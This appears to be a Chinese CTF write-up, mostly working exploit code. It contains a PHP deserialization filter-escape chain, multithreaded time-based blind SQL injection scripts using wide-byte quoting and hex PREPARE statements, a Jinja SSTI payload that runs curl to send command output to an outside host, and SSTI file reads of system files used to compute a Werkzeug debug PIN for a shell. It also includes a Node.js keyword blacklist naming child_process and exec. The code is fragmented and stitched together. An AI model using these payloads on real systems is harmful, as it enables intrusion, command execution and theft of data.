<?php functionsafe($parm){ $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter"); return str_replace($array,'hacker',$parm); } classUser { public $id; public $age='select password,password from user where username!=?'; public $nickname=null; } classInfo{ public $age; public $nickname = "a"; public $CtrlCase; } ClassUpdateHelper{ public $id; public $newinfo; public $sql; } classdbCtrl { public $hostname="127.0.0.1"; public $dbuser="noob123"; public $dbpass="noob123"; public $database="noob123"; public $name='1'; public $password=2; public $mysqli; public $token="admin"; } $o = new dbCtrl(); $i = new Info(); $i->CtrlCase = $o; $u = new User(); $u->nickname = $i; $h = new UpdateHelper(); $h->sql = $u; $f = new Info(); $f->CtrlCase = $h; $s = serialize($f); assert($s===safe($s)); $s = substr($s,47); $len = strlen($s); $res = ""; for($dd=0;$dd<$len;$dd++){ $res.="union"; } $res.=$s; file_put_contents("out.txt", $res);
import requests from Crypto.Util.number import long_to_bytes, bytes_to_long from libnum import s2n import string import re url = "http://e0bac4dbfc61452b906f16cacbe31e9bfe43db0e990f4ace.changame.ichunqiu.com/" pattern = re.compile("union|select|mid|substr|and|or|sleep|benchmark|join|limit|#|-|\^|&|database", re.I) defgen(payload, pos, num): """ SET @SQL=0x73656c65637420646174616261736528293b; PREPARE pord FROM @SQL;EXECUTE pord;""" res = "%bf%27;SET @x=" + (hex(s2n(payload % (pos, num)))) + ";PREPARE xx FROM @x;EXECUTE xx;/*" # print(res) if pattern.match(res): print("match") exit(0) return res
defexp(): # payload = "select if((ascii(substr(reverse((select group_concat(table_name) from information_schema.tables where table_schema=database())),%d,1))>%d),0,sleep(4));" payload = "select if((ascii(substr(reverse((select fllllll4g from pdotest.table1)),%d,1))>%d),0,sleep(4));" res = "" for i in range(1,60): start = 32 end = 128 mid = (end + start) // 2 while end > start: params = { "id": gen(payload, i, mid) } try: requests.get(url+"?id="+params['id'], timeout=2) start = mid + 1 except: end = mid mid = (end + start) // 2 res = chr(mid) + res print(res) # print(f"{i}: {res}")
if __name__ == "__main__": exp()
改进了一个多线程版本, 一分钟不到就可以注出结果
import requests from libnum import s2n import string import re from multiprocessing.pool import ThreadPool url = "http://e0bac4dbfc61452b906f16cacbe31e9bfe43db0e990f4ace.changame.ichunqiu.com/" pattern = re.compile("union|select|mid|substr|and|or|sleep|benchmark|join|limit|#|-|\^|&|database", re.I) res = [""for i in range(60)] defgen(payload, pos, num): """ SET @SQL=0x73656c65637420646174616261736528293b; PREPARE pord FROM @SQL;EXECUTE pord;""" res = "%bf%27;SET @x=" + (hex(s2n(payload % (pos, num)))) + ";PREPARE xx FROM @x;EXECUTE xx;/*" # print(res) if pattern.match(res): print("match") exit(0) return res
defexp(i): # payload = "select if((ascii(substr(reverse((select group_concat(table_name) from information_schema.tables where table_schema=database())),%d,1))>%d),0,sleep(4));" payload = "select if((ascii(substr(((select fllllll4g from pdotest.table1)),%d,1))>%d),0,sleep(4));" # for i in range(1,60): if i: start = 32 end = 128 mid = (end + start) // 2 while end > start: params = { "id": gen(payload, i, mid) } try: requests.get(url+"?id="+params['id'], timeout=2) start = mid + 1 except: end = mid mid = (end + start) // 2 res[i] = chr(mid) print("".join(res)) # print(f"{i}: {res}")
if __name__ == "__main__": pool = ThreadPool(5) for i in range(45): pool.apply_async(exp, (i, )) # exp() pool.close() pool.join()
payload = "{% if [].__class__.__base__.__subclasses__()[127].__init__.__globals__['sys'+'tem']('curl http://ip:9000/`ls`') %}2{% endif %}"
顺带一提, 当时 ls 后的结果不全, 不知道是否有截断, 可以使用
ls -r
反序输出
debug 界面使用 pin 码 getshell
根据上面安全客的文章, 但是一直没算对, 脚本如下, 主要的点在于
获取 machineid 的地方发生了更新, 这里应该使用
读文件的 payload 如下
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
先获取需要的几个参数, 然后再计算一下, 就可以 getshell 了
import requests from base64 import b64encode
url = "http://182.92.243.154:10002/" payload = "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}"
h = hashlib.md5() for bit in chain(probably_public_bits, private_bits): ifnot bit: continue if isinstance(bit, str): bit = bit.encode('utf-8') h.update(bit) h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None if num isNone: h.update(b'pinsalt') num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None if rv isNone: for group_size in5, 4, 3: if len(num) % group_size == 0: rv = '-'.join(num[x:x + group_size].rjust(group_size, '0') for x in range(0, len(num), group_size)) break else: rv = num
return rv defgetnet(): file = "/sys/class/net/eth0/address" data = { "text":b64encode(payload.replace("filename", file).encode()) } res = requests.post(f"{url}decode", data=data).text import re res = re.findall("结果.+", res)[0][-17:] return add2str(res) defgetmachine(): file = "/proc/self/cgroup" data = { "text":b64encode(payload.replace("filename", file).encode()) } res = requests.post(f"{url}decode", data=data).text import re res = re.findall("结果.+", res)[0][22:] return res defreadfile(name): data = { "text":b64encode(payload.replace("filename", name).encode()) } res = requests.post(f"{url}decode", data=data).text import re # res = re.findall("结果.+", res, re.MULTILINE) print(res) print(b64encode(payload.replace("filename", name).encode()))
var express = require("express"); var app = express(); var fs = require("fs"); var path = require("path"); var http = require("http"); var pug = require("pug"); var morgan = require("morgan"); const multer = require("multer");
functionblacklist(url) { var evilwords = [ "global", "process", "mainModule", "require", "root", "child_process", "exec", '"', "'", "!" ]; var arrayLen = evilwords.length; for (var i = 0; i < arrayLen; i++) { const trigger = url.includes(evilwords[i]); if (trigger === true) { returntrue; } } }
var server = app.listen(8081, function() { var host = server.address().address; var port = server.address().port; console.log("Example app listening at http://%s:%s", host, port); });
评论